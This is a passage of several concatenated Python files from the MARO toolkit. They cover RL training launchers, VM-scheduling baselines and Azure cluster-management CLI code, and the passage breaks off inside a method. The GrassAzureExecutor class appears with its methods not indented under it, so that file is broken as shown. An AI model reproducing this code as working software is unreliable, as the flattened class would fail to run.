    """Run the distributed ACTOR side of the CIM policy-optimization example."""
    config = convert_dottable(config)
    env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
    agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
    state_shaper = CIMStateShaper(**config.env.state_shaping)
    action_shaper = CIMActionShaper(action_space=list(np.linspace(-1.0, 1.0, config.agents.num_actions)))
    experience_shaper = TruncatedExperienceShaper(**config.env.experience_shaping)
    # The policy network input size depends on the state shaper's output dim.
    config["agents"]["input_dim"] = state_shaper.dim
    agent_manager = POAgentManager(
        name="cim_actor",
        mode=AgentManagerMode.INFERENCE,
        agent_dict=create_po_agents(agent_id_list, config.agents),
        state_shaper=state_shaper,
        action_shaper=action_shaper,
        experience_shaper=experience_shaper,
    )
    # NOTE(review): unlike the DQN example, the group name comes only from the
    # GROUP env var and Redis is hard-coded to localhost:6379 — confirm
    # whether distributed_config support was intentionally omitted here.
    proxy_params = {
        "group_name": os.environ["GROUP"],
        "expected_peers": {"learner": 1},
        "redis_address": ("localhost", 6379)
    }
    actor_worker = ActorWorker(
        local_actor=SimpleActor(env=env, agent_manager=agent_manager),
        proxy_params=proxy_params
    )
    # Blocks, serving rollout requests until the learner signals exit.
    actor_worker.launch()


if __name__ == "__main__":
    from components.config import config
    launch(config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from maro.rl import ActorProxy, AgentManagerMode, Scheduler, SimpleLearner, merge_experiences_with_trajectory_boundaries
from maro.simulator import Env
from maro.utils import Logger, convert_dottable
from components import CIMStateShaper, POAgentManager, create_po_agents
def launch(config):
    """Run the distributed LEARNER side of the CIM policy-optimization example."""
    config = convert_dottable(config)
    env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
    agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
    # The policy network input size depends on the state shaper's output dim.
    config["agents"]["input_dim"] = CIMStateShaper(**config.env.state_shaping).dim
    agent_manager = POAgentManager(
        name="cim_learner",
        mode=AgentManagerMode.TRAIN,
        agent_dict=create_po_agents(agent_id_list, config.agents)
    )
    # NOTE(review): group/actor-count come only from env vars and Redis is
    # hard-coded to localhost:6379 (cf. the DQN example's YAML fallbacks).
    proxy_params = {
        "group_name": os.environ["GROUP"],
        "expected_peers": {"actor": int(os.environ["NUM_ACTORS"])},
        "redis_address": ("localhost", 6379)
    }
    learner = SimpleLearner(
        agent_manager=agent_manager,
        actor=ActorProxy(
            proxy_params=proxy_params, experience_collecting_func=merge_experiences_with_trajectory_boundaries
        ),
        scheduler=Scheduler(config.main_loop.max_episode),
        logger=Logger("cim_learner", auto_timestamp=False)
    )
    learner.learn()
    learner.test()
    learner.dump_models(os.path.join(os.getcwd(), "models"))
    # Tell remote actors to shut down.
    learner.exit()


if __name__ == "__main__":
    from components.config import config
    launch(config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
This script is used to debug distributed algorithm in single host multi-process mode.
"""
import argparse
import os
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("group_name", help="group name")
    parser.add_argument("num_actors", type=int, help="number of actors")
    args = parser.parse_args()
    # Both command strings end in '&' so every process runs in the background.
    learner_path = f"{os.path.split(os.path.realpath(__file__))[0]}/dist_learner.py &"
    actor_path = f"{os.path.split(os.path.realpath(__file__))[0]}/dist_actor.py &"
    # Launch the learner process
    # NOTE(review): arguments are interpolated into a shell string (os.system);
    # acceptable for a local debug tool, but never reuse with untrusted input.
    os.system(f"GROUP={args.group_name} NUM_ACTORS={args.num_actors} python " + learner_path)
    # Launch the actor processes
    for _ in range(args.num_actors):
        os.system(f"GROUP={args.group_name} python " + actor_path)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from statistics import mean
import numpy as np
from maro.simulator import Env
from maro.rl import AgentManagerMode, Scheduler, SimpleActor, SimpleLearner
from maro.utils import LogFormat, Logger, convert_dottable
from components import CIMActionShaper, CIMStateShaper, POAgentManager, TruncatedExperienceShaper, create_po_agents
class EarlyStoppingChecker:
    """Callable that decides, from the performance history, whether to stop early.

    Early stopping triggers only after a warm-up period, and only when the
    recent fulfillment ratios are both high (mean above ``perf_threshold``)
    and stable (largest relative step change below
    ``perf_stability_threshold``).

    Args:
        warmup_ep (int): Episode from which early stopping checking is initiated.
        last_k (int): Number of latest performance records to check.
        perf_threshold (float): Minimum mean of the last ``last_k`` metrics.
        perf_stability_threshold (float): Maximum one-step relative change
            over the last ``last_k`` metrics.
    """

    def __init__(self, warmup_ep: int, last_k: int, perf_threshold: float, perf_stability_threshold: float):
        self._warmup_ep = warmup_ep
        self._last_k = last_k
        self._perf_threshold = perf_threshold
        self._perf_stability_threshold = perf_stability_threshold

        def fulfillment_ratio(record):
            # Share of order requirements actually met in this episode.
            return 1 - record["container_shortage"] / record["order_requirements"]

        self._metric_func = fulfillment_ratio

    def __call__(self, perf_history) -> bool:
        # Too little history: not warmed up, or not enough points to judge.
        if len(perf_history) < max(self._last_k, self._warmup_ep):
            return False
        recent = [self._metric_func(record) for record in perf_history[-self._last_k:]]
        max_delta = max(
            abs(recent[i] - recent[i - 1]) / recent[i - 1] for i in range(1, self._last_k)
        )
        print(f"mean_metric: {mean(recent)}, max_delta: {max_delta}")
        return mean(recent) > self._perf_threshold and max_delta < self._perf_stability_threshold
def launch(config):
    """Single-process training entry point for the CIM policy-optimization example."""
    # First determine the input dimension and add it to the config.
    config = convert_dottable(config)
    # Step 1: initialize a CIM environment for using a toy dataset.
    env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
    agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
    # Step 2: create state, action and experience shapers. We also need to create an explorer here due to the
    # greedy nature of the DQN algorithm.
    state_shaper = CIMStateShaper(**config.env.state_shaping)
    action_shaper = CIMActionShaper(action_space=list(np.linspace(-1.0, 1.0, config.agents.num_actions)))
    experience_shaper = TruncatedExperienceShaper(**config.env.experience_shaping)
    # Step 3: create an agent manager.
    # The policy network input size depends on the state shaper's output dim.
    config["agents"]["input_dim"] = state_shaper.dim
    agent_manager = POAgentManager(
        name="cim_learner",
        mode=AgentManagerMode.TRAIN_INFERENCE,
        agent_dict=create_po_agents(agent_id_list, config.agents),
        state_shaper=state_shaper,
        action_shaper=action_shaper,
        experience_shaper=experience_shaper,
    )
    # Step 4: Create an actor and a learner to start the training process.
    # Early stopping consults the recent performance records each episode.
    scheduler = Scheduler(
        config.main_loop.max_episode,
        early_stopping_checker=EarlyStoppingChecker(**config.main_loop.early_stopping)
    )
    actor = SimpleActor(env, agent_manager)
    learner = SimpleLearner(
        agent_manager, actor, scheduler,
        logger=Logger("cim_learner", format_=LogFormat.simple, auto_timestamp=False)
    )
    learner.learn()
    learner.test()
    learner.dump_models(os.path.join(os.getcwd(), "models"))


if __name__ == "__main__":
    from components.config import config
    launch(config)
--- FILE SEPARATOR ---
import io
import os
import random
import timeit
import yaml
from maro.simulator import Env
from maro.simulator.scenarios.vm_scheduling import AllocateAction, DecisionPayload, PostponeAction
from maro.utils import convert_dottable
# Load the scenario configuration (sibling config.yml) into a dotted dict.
CONFIG_PATH = os.path.join(os.path.split(os.path.realpath(__file__))[0], "config.yml")
with io.open(CONFIG_PATH, "r") as in_file:
    raw_config = yaml.safe_load(in_file)
config = convert_dottable(raw_config)


if __name__ == "__main__":
    # Best-fit baseline: allocate each VM to the valid PM with the fewest
    # remaining CPU cores (tightest fit); postpone when no PM is valid.
    start_time = timeit.default_timer()
    env = Env(
        scenario=config.env.scenario,
        topology=config.env.topology,
        start_tick=config.env.start_tick,
        durations=config.env.durations,
        snapshot_resolution=config.env.resolution
    )
    # Seed both the simulator and Python's RNG for reproducible runs.
    if config.env.seed is not None:
        env.set_seed(config.env.seed)
        random.seed(config.env.seed)

    metrics: object = None
    decision_event: DecisionPayload = None
    is_done: bool = False
    action: AllocateAction = None

    # First step with no action yields the initial decision event.
    metrics, decision_event, is_done = env.step(None)
    while not is_done:
        valid_pm_num: int = len(decision_event.valid_pms)
        if valid_pm_num <= 0:
            # No valid PM now, postpone.
            action: PostponeAction = PostponeAction(
                vm_id=decision_event.vm_id,
                postpone_step=1
            )
        else:
            # Get the capacity and allocated cores from snapshot.
            valid_pm_info = env.snapshot_list["pms"][
                env.frame_index:decision_event.valid_pms:["cpu_cores_capacity", "cpu_cores_allocated"]
            ].reshape(-1, 2)
            # Calculate to get the remaining cpu cores.
            cpu_cores_remaining = valid_pm_info[:, 0] - valid_pm_info[:, 1]
            # Choose the one with the closet remaining CPU.
            # (linear scan for the minimum; index back into valid_pms below)
            chosen_idx = 0
            minimum_remaining_cpu_cores = cpu_cores_remaining[0]
            for i, remaining in enumerate(cpu_cores_remaining):
                if remaining < minimum_remaining_cpu_cores:
                    chosen_idx = i
                    minimum_remaining_cpu_cores = remaining
            # Take action to allocate on the closet pm.
            action: AllocateAction = AllocateAction(
                vm_id=decision_event.vm_id,
                pm_id=decision_event.valid_pms[chosen_idx]
            )
        metrics, decision_event, is_done = env.step(action)

    end_time = timeit.default_timer()
    print(
        f"[Best fit] Topology: {config.env.topology}. Total ticks: {config.env.durations}."
        f" Start tick: {config.env.start_tick}."
    )
    print(f"[Timer] {end_time - start_time:.2f} seconds to finish the simulation.")
    print(metrics)
--- FILE SEPARATOR ---
import io
import os
import random
import timeit
import yaml
from maro.simulator import Env
from maro.simulator.scenarios.vm_scheduling import AllocateAction, DecisionPayload, PostponeAction
from maro.utils import convert_dottable
# Load the scenario config that lives beside this script.
CONFIG_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "config.yml")
with open(CONFIG_PATH, "r") as config_file:
    raw_config = yaml.safe_load(config_file)
config = convert_dottable(raw_config)
if __name__ == "__main__":
    start_time = timeit.default_timer()

    # Build the simulation environment from the config section.
    env = Env(
        scenario=config.env.scenario,
        topology=config.env.topology,
        start_tick=config.env.start_tick,
        durations=config.env.durations,
        snapshot_resolution=config.env.resolution
    )
    if config.env.seed is not None:
        env.set_seed(config.env.seed)
        random.seed(config.env.seed)

    metrics: object = None
    decision_event: DecisionPayload = None
    is_done: bool = False
    action: AllocateAction = None

    # Drive the env with a random policy: allocate each VM to a uniformly
    # chosen valid PM; postpone when no PM can host it.
    metrics, decision_event, is_done = env.step(None)
    while not is_done:
        valid_pm_num: int = len(decision_event.valid_pms)
        if valid_pm_num <= 0:
            # No valid PM now, postpone.
            action = PostponeAction(
                vm_id=decision_event.vm_id,
                postpone_step=1
            )
        else:
            # Randomly choose an available PM.
            random_idx = random.randint(0, valid_pm_num - 1)
            pm_id = decision_event.valid_pms[random_idx]
            action = AllocateAction(
                vm_id=decision_event.vm_id,
                pm_id=pm_id
            )
        metrics, decision_event, is_done = env.step(action)

    end_time = timeit.default_timer()
    # BUG FIX: the two f-strings were separated by a comma, so print() received
    # two arguments and inserted an extra space; the trailing period was also
    # missing. Use implicit string concatenation, consistent with the
    # best-fit sibling script.
    print(
        f"[Random] Topology: {config.env.topology}. Total ticks: {config.env.durations}."
        f" Start tick: {config.env.start_tick}."
    )
    print(f"[Timer] {end_time - start_time:.2f} seconds to finish the simulation.")
    print(metrics)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import yaml
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.grass.executors.grass_on_premises_executor import GrassOnPremisesExecutor
from maro.utils.exception.cli_exception import BadRequestError, FileOperationError, InvalidDeploymentTemplateError
def create(deployment_path: str, **kwargs):
    """Create a grass cluster from a yaml create-deployment template.

    Args:
        deployment_path: Path to the yaml deployment template file.

    Raises:
        BadRequestError: If the template's mode is not a supported grass mode.
        InvalidDeploymentTemplateError: If a required key is missing from the template.
        FileOperationError: If the template file cannot be found.
    """
    try:
        with open(deployment_path, "r") as fr:
            create_deployment = yaml.safe_load(fr)
        if create_deployment["mode"] == "grass/azure":
            GrassAzureExecutor.build_cluster_details(create_deployment=create_deployment)
            executor = GrassAzureExecutor(cluster_name=create_deployment["name"])
            executor.create()
        elif create_deployment["mode"] == "grass/on-premises":
            GrassOnPremisesExecutor.build_cluster_details(create_deployment=create_deployment)
            executor = GrassOnPremisesExecutor(cluster_name=create_deployment["name"])
            executor.create()
        else:
            raise BadRequestError(f"Unsupported command in mode '{create_deployment['mode']}'.")
    except KeyError as e:
        # Chain the original error so the offending key access stays in the traceback.
        raise InvalidDeploymentTemplateError(f"Missing key '{e.args[0]}'.") from e
    except FileNotFoundError as e:
        raise FileOperationError("Invalid template file path.") from e
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError
@check_details_validity
@lock
def push_data(cluster_name: str, local_path: str, remote_path: str, **kwargs):
    """Copy a local file or directory onto the named cluster's master node."""
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    # NOTE(review): both grass modes are routed to the Azure executor here —
    # confirm on-premises clusters really share this data path.
    if cluster_details["mode"] not in ("grass/azure", "grass/on-premises"):
        raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
    executor = GrassAzureExecutor(cluster_name=cluster_name)
    executor.push_data(local_path=local_path, remote_path=remote_path)
@check_details_validity
@lock
def pull_data(cluster_name: str, local_path: str, remote_path: str, **kwargs):
    """Copy a file or directory from the named cluster's master node to a local path."""
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    # NOTE(review): both grass modes are routed to the Azure executor here —
    # confirm on-premises clusters really share this data path.
    if cluster_details["mode"] not in ("grass/azure", "grass/on-premises"):
        raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
    executor = GrassAzureExecutor(cluster_name=cluster_name)
    executor.pull_data(local_path=local_path, remote_path=remote_path)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.grass.executors.grass_on_premises_executor import GrassOnPremisesExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError
@check_details_validity
@lock
def delete(cluster_name: str, **kwargs):
    """Tear down the named cluster with the executor matching its mode."""
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    executor_classes = {
        "grass/azure": GrassAzureExecutor,
        "grass/on-premises": GrassOnPremisesExecutor,
    }
    executor_class = executor_classes.get(cluster_details["mode"])
    if executor_class is None:
        raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
    executor_class(cluster_name=cluster_name).delete()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import collections
import json
import os
import secrets
import shutil
import string
import threading
import time
from copy import deepcopy
from multiprocessing.pool import ThreadPool
import yaml
from maro.cli.grass.executors.grass_executor import GrassExecutor
from maro.cli.grass.utils.copy import copy_and_rename, copy_files_from_node, copy_files_to_node
from maro.cli.grass.utils.hash import get_checksum
from maro.cli.utils.details import (
load_cluster_details, load_job_details, load_schedule_details, save_cluster_details, save_job_details,
save_schedule_details
)
from maro.cli.utils.executors.azure_executor import AzureExecutor
from maro.cli.utils.naming import (
generate_cluster_id, generate_component_id, generate_job_id, generate_node_name, get_valid_file_name
)
from maro.cli.utils.params import GlobalParams, GlobalPaths
from maro.cli.utils.subprocess import SubProcess
from maro.cli.utils.validation import validate_and_fill_dict
from maro.utils.exception.cli_exception import BadRequestError, CommandExecutionError, FileOperationError
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class GrassAzureExecutor:
def __init__(self, cluster_name: str):
    """Bind this executor to a cluster: cache its name, persisted details,
    and a grass executor configured from those details."""
    details = load_cluster_details(cluster_name=cluster_name)
    self.cluster_name = cluster_name
    self.cluster_details = details
    self.grass_executor = GrassExecutor(cluster_details=details)
# maro grass create
@staticmethod
def build_cluster_details(create_deployment: dict):
    """Standardize the create deployment and persist it as the cluster details.

    Args:
        create_deployment: Parsed create-deployment template (mutated in place
            by standardization).

    Raises:
        BadRequestError: If a cluster with the same name already exists locally.
    """
    # Standardize create deployment
    GrassAzureExecutor._standardize_create_deployment(create_deployment=create_deployment)
    # Get cluster name and save details
    cluster_name = create_deployment["name"]
    if os.path.isdir(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_name}"):
        # Fixed error-message grammar ("is exist." -> "already exists.").
        raise BadRequestError(f"Cluster '{cluster_name}' already exists.")
    os.makedirs(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_name}")
    save_cluster_details(
        cluster_name=cluster_name,
        cluster_details=create_deployment
    )
@staticmethod
def _standardize_create_deployment(create_deployment: dict):
    """Fill optional fields of the create deployment with defaults and validate it.

    Mutates ``create_deployment`` in place via ``validate_and_fill_dict``.
    """
    # Random 20-character alphanumeric password for the master's samba share.
    samba_password = "".join(secrets.choice(string.ascii_letters + string.digits) for _ in range(20))
    # Deep-path keys (DeepDiff-style "root[...]" notation) that may be absent
    # from the user's template, mapped to the default value to fill in.
    optional_key_to_value = {
        "root['master']['redis']": {"port": GlobalParams.DEFAULT_REDIS_PORT},
        "root['master']['redis']['port']": GlobalParams.DEFAULT_REDIS_PORT,
        "root['master']['fluentd']": {"port": GlobalParams.DEFAULT_FLUENTD_PORT},
        "root['master']['fluentd']['port']": GlobalParams.DEFAULT_FLUENTD_PORT,
        "root['master']['samba']": {"password": samba_password},
        "root['master']['samba']['password']": samba_password,
        "root['connection']": {"ssh": {"port": GlobalParams.DEFAULT_SSH_PORT}},
        "root['connection']['ssh']": {"port": GlobalParams.DEFAULT_SSH_PORT},
        "root['connection']['ssh']['port']": GlobalParams.DEFAULT_SSH_PORT
    }
    # Reference template shipped with the grass lib.
    with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/grass_azure_create.yml") as fr:
        create_deployment_template = yaml.safe_load(fr)
    # Validate the actual deployment against the template, filling in defaults.
    validate_and_fill_dict(
        template_dict=create_deployment_template,
        actual_dict=create_deployment,
        optional_key_to_value=optional_key_to_value
    )
def create(self):
    """Create the full cluster: cluster id, resource group, vnet, node image and master.

    The node-image build and the master creation are independent, so they run
    concurrently on two threads. On any failure the local cluster folder is
    removed before the exception propagates.
    """
    logger.info("Creating cluster")
    # Start creating
    try:
        self._set_cluster_id()
        self._create_resource_group()
        self._create_vnet()
        # Simultaneously capture image and init master
        build_node_image_thread = threading.Thread(target=self._build_node_image, args=())
        build_node_image_thread.start()
        create_and_init_master_thread = threading.Thread(target=self._create_and_init_master, args=())
        create_and_init_master_thread.start()
        build_node_image_thread.join()
        create_and_init_master_thread.join()
    except Exception:
        # If failed, remove the details folder, then re-raise. Bare `raise`
        # (instead of the original `raise e`) keeps the traceback untouched.
        shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}")
        raise
    logger.info_green(f"Cluster {self.cluster_name} is created")
def _set_cluster_id(self):
    """Generate a fresh cluster id and persist it into the cluster details."""
    self.cluster_details["id"] = generate_cluster_id()
    save_cluster_details(cluster_name=self.cluster_name, cluster_details=self.cluster_details)
def _create_resource_group(self):
    """Ensure the configured Azure resource group exists.

    Verifies the Azure CLI is installed, selects the configured subscription,
    and creates the resource group unless it is already present.
    """
    # Load and reload details
    subscription = self.cluster_details["cloud"]["subscription"]
    resource_group = self.cluster_details["cloud"]["resource_group"]
    location = self.cluster_details["cloud"]["location"]
    # Check if Azure CLI is installed (get_version fails otherwise)
    version_details = AzureExecutor.get_version()
    logger.info_green(f"Your Azure CLI version: {version_details['azure-cli']}")
    # Set subscription id
    AzureExecutor.set_subscription(subscription=subscription)
    logger.info_green(f"Set subscription to: {subscription}")
    # Check and create resource group
    resource_group_details = AzureExecutor.get_resource_group(resource_group=resource_group)
    if resource_group_details is not None:
        # Reuse the existing group rather than failing.
        logger.warning_yellow(f"Azure resource group {resource_group} already exists")
    else:
        AzureExecutor.create_resource_group(
            resource_group=resource_group,
            location=location
        )
        logger.info_green(f"Resource group: {resource_group} is created")
def _create_vnet(self):
    """Deploy the cluster's virtual network via an ARM template deployment."""
    logger.info("Creating vnet")
    # Load details
    resource_group = self.cluster_details["cloud"]["resource_group"]
    # Create ARM parameters and start deployment. The parameters file is
    # generated from the cluster details by ArmTemplateParameterBuilder
    # (defined elsewhere in this module).
    abs_template_file_path = f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_vnet/template.json"
    abs_parameters_file_path = (
        f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_vnet/parameters.json"
    )
    ArmTemplateParameterBuilder.create_vnet(
        cluster_details=self.cluster_details,
        export_path=abs_parameters_file_path
    )
    AzureExecutor.start_deployment(
        resource_group=resource_group,
        deployment_name="vnet",
        template_file_path=abs_template_file_path,
        parameters_file_path=abs_parameters_file_path
    )
    logger.info_green("Vnet is created")
def _build_node_image(self):
    """Build the reusable MARO node VM image.

    Deploys a temporary builder VM, initializes it over SSH, captures it as
    an Azure image named ``<cluster_id>-node-image``, then deletes the
    builder VM's resources.
    """
    logger.info("Building MARO Node image")
    # Load details
    resource_name = "build-node-image"
    cluster_id = self.cluster_details["id"]
    resource_group = self.cluster_details["cloud"]["resource_group"]
    admin_username = self.cluster_details["user"]["admin_username"]
    ssh_port = self.cluster_details["connection"]["ssh"]["port"]
    image_name = f"{cluster_id}-node-image"
    vm_name = f"{cluster_id}-{resource_name}-vm"
    # Create ARM parameters and start deployment
    template_file_path = f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_build_node_image_vm/template.json"
    parameters_file_path = (
        f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_build_node_image_vm/parameters.json"
    )
    ArmTemplateParameterBuilder.create_build_node_image_vm(
        cluster_details=self.cluster_details,
        node_size="Standard_D4_v3",
        export_path=parameters_file_path
    )
    AzureExecutor.start_deployment(
        resource_group=resource_group,
        deployment_name=resource_name,
        template_file_path=template_file_path,
        parameters_file_path=parameters_file_path
    )
    # Gracefully wait (give the VM a moment before querying its addresses)
    time.sleep(10)
    # Get IP addresses
    ip_addresses = AzureExecutor.list_ip_addresses(
        resource_group=resource_group,
        vm_name=vm_name
    )
    public_ip_address = ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"]
    # Make sure capture-node-image-vm is able to connect
    self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=public_ip_address)
    # Run init image script
    self._sync_mkdir(path=GlobalPaths.MARO_LOCAL_TMP, node_ip_address=public_ip_address)
    copy_files_to_node(
        local_path=f"{GlobalPaths.MARO_GRASS_LIB}/scripts/init_build_node_image_vm.py",
        remote_dir="~/",
        admin_username=admin_username, node_ip_address=public_ip_address, ssh_port=ssh_port
    )
    self.grass_executor.remote_init_build_node_image_vm(vm_ip_address=public_ip_address)
    # Extract image: deallocate and generalize the VM, then capture it.
    AzureExecutor.deallocate_vm(resource_group=resource_group, vm_name=vm_name)
    AzureExecutor.generalize_vm(resource_group=resource_group, vm_name=vm_name)
    AzureExecutor.create_image_from_vm(resource_group=resource_group, image_name=image_name, vm_name=vm_name)
    # Delete resources of the temporary builder VM
    self._delete_resources(resource_name=resource_name)
    logger.info_green("MARO Node Image is built")
def _create_and_init_master(self):
    """Provision the master VM, then initialize it (runs on a worker thread in create())."""
    logger.info("Creating MARO Master")
    self._create_master()
    self._init_master()
    logger.info_green("MARO Master is created")
def _create_master(self):
    """Deploy the master VM via ARM templates and record its addresses.

    Fills ``public_ip_address``, ``private_ip_address``, ``hostname`` and
    ``resource_name`` into the in-memory master details and saves the
    cluster details locally.
    """
    logger.info("Creating Master VM")
    # Load details
    master_details = self.cluster_details["master"]
    cluster_id = self.cluster_details["id"]
    resource_group = self.cluster_details["cloud"]["resource_group"]
    admin_username = self.cluster_details["user"]["admin_username"]
    node_size = self.cluster_details["master"]["node_size"]
    # Create ARM parameters and start deployment
    template_file_path = f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_master/template.json"
    parameters_file_path = (
        f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_master/parameters.json"
    )
    ArmTemplateParameterBuilder.create_master(
        cluster_details=self.cluster_details,
        node_size=node_size,
        export_path=parameters_file_path
    )
    AzureExecutor.start_deployment(
        resource_group=resource_group,
        deployment_name="master",
        template_file_path=template_file_path,
        parameters_file_path=parameters_file_path
    )
    # Get master IP addresses
    ip_addresses = AzureExecutor.list_ip_addresses(
        resource_group=resource_group,
        vm_name=f"{cluster_id}-master-vm"
    )
    public_ip_address = ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"]
    private_ip_address = ip_addresses[0]["virtualMachine"]["network"]["privateIpAddresses"][0]
    hostname = f"{cluster_id}-master-vm"
    master_details["public_ip_address"] = public_ip_address
    master_details["private_ip_address"] = private_ip_address
    master_details["hostname"] = hostname
    master_details["resource_name"] = f"{cluster_id}-master-vm"
    logger.info_green(f"You can login to your master node with: ssh {admin_username}@{public_ip_address}")
    # Save details. sync=False keeps the save local — presumably the master
    # cannot receive a sync until _init_master runs (TODO confirm).
    save_cluster_details(
        cluster_name=self.cluster_name,
        cluster_details=self.cluster_details,
        sync=False
    )
    logger.info_green("Master VM is created")
def _init_master(self):
    """Initialize the freshly created master VM.

    Creates the remote folder layout, copies the grass lib and cluster files,
    runs the remote init script, starts the master agent service and records
    the master's public key in the saved details.
    """
    logger.info("Initializing Master VM")
    # Load details
    master_details = self.cluster_details["master"]
    admin_username = self.cluster_details["user"]["admin_username"]
    master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
    ssh_port = self.cluster_details["connection"]["ssh"]["port"]
    # Make sure master is able to connect
    self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=master_public_ip_address)
    # Create the required folder layout on the master (order preserved).
    cluster_dir = f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}"
    for path_to_make in (
        GlobalPaths.MARO_GRASS_LIB,
        cluster_dir,
        f"{cluster_dir}/data",
        f"{cluster_dir}/images",
        f"{cluster_dir}/jobs",
        f"{cluster_dir}/schedules",
        GlobalPaths.MARO_LOCAL_TMP,
    ):
        self._sync_mkdir(path=path_to_make, node_ip_address=master_public_ip_address)
    # Copy required files
    copy_files_to_node(
        local_path=GlobalPaths.MARO_GRASS_LIB,
        remote_dir=GlobalPaths.MARO_LIB,
        admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
    )
    copy_files_to_node(
        local_path=cluster_dir,
        remote_dir=GlobalPaths.MARO_CLUSTERS,
        admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
    )
    # Get public key
    public_key = self.grass_executor.remote_get_public_key(node_ip_address=master_public_ip_address)
    # Remote init master, then start the master agent service.
    self.grass_executor.remote_init_master()
    self.grass_executor.remote_load_master_agent_service()
    # Save details
    master_details["public_key"] = public_key
    master_details["image_files"] = {}
    save_cluster_details(
        cluster_name=self.cluster_name,
        cluster_details=self.cluster_details
    )
    self.grass_executor.remote_set_master_details(master_details=master_details)
    logger.info_green("Master VM is initialized")
# maro grass delete
def delete(self):
    """Delete every Azure resource belonging to this cluster and its local folder.

    Cluster ownership is recognized by the cluster-id prefix on resource names.
    """
    # Load details
    cluster_id = self.cluster_details["id"]
    resource_group = self.cluster_details["cloud"]["resource_group"]
    logger.info(f"Deleting cluster {self.cluster_name}")
    # Get resource list and filter to this cluster's resources (idiomatic
    # comprehension instead of a manual append loop).
    resource_list = AzureExecutor.list_resources(resource_group=resource_group)
    deletable_ids = [
        resource_info["id"]
        for resource_info in resource_list
        if resource_info["name"].startswith(cluster_id)
    ]
    # Delete resources
    if deletable_ids:
        AzureExecutor.delete_resources(resources=deletable_ids)
    # Delete cluster folder
    shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}")
    logger.info_green(f"Cluster {self.cluster_name} is deleted")
# maro grass node
def scale_node(self, replicas: int, node_size: str):
    """Scale the number of nodes of ``node_size`` up or down to ``replicas``.

    Args:
        replicas: Desired number of nodes of this size.
        node_size: Azure VM size name.

    Raises:
        BadRequestError: If ``node_size`` is not an available VM size.
    """
    # Count existing nodes per size. defaultdict(int) is the idiomatic
    # replacement for defaultdict(lambda: 0); only the values are needed.
    nodes_details = self.grass_executor.remote_get_nodes_details()
    node_size_to_count = collections.defaultdict(int)
    for node_details in nodes_details.values():
        node_size_to_count[node_details["node_size"]] += 1
    # Get node_size_to_spec
    node_size_to_spec = self._get_node_size_to_spec()
    if node_size not in node_size_to_spec:
        raise BadRequestError(f"Invalid node_size '{node_size}'.")
    # Scale nodes
    if node_size_to_count[node_size] > replicas:
        self._delete_nodes(
            num=node_size_to_count[node_size] - replicas,
            node_size=node_size
        )
    elif node_size_to_count[node_size] < replicas:
        self._create_nodes(
            num=replicas - node_size_to_count[node_size],
            node_size=node_size,
            node_size_to_spec=node_size_to_spec
        )
    else:
        logger.warning_yellow("Replica is match, no create or delete")
def _create_nodes(self, num: int, node_size: str, node_size_to_spec: dict) -> None:
    """Create ``num`` nodes of ``node_size`` in parallel."""
    logger.info(f"Scaling up {num}")
    # One identical (node_size, node_size_to_spec) argument pair per node.
    starmap_args = [[node_size, node_size_to_spec] for _ in range(num)]
    with ThreadPool(GlobalParams.PARALLELS) as pool:
        pool.starmap(self._create_node, starmap_args)
def _create_node(self, node_size: str, node_size_to_spec: dict):
    """Create and initialize a single node under a freshly generated name."""
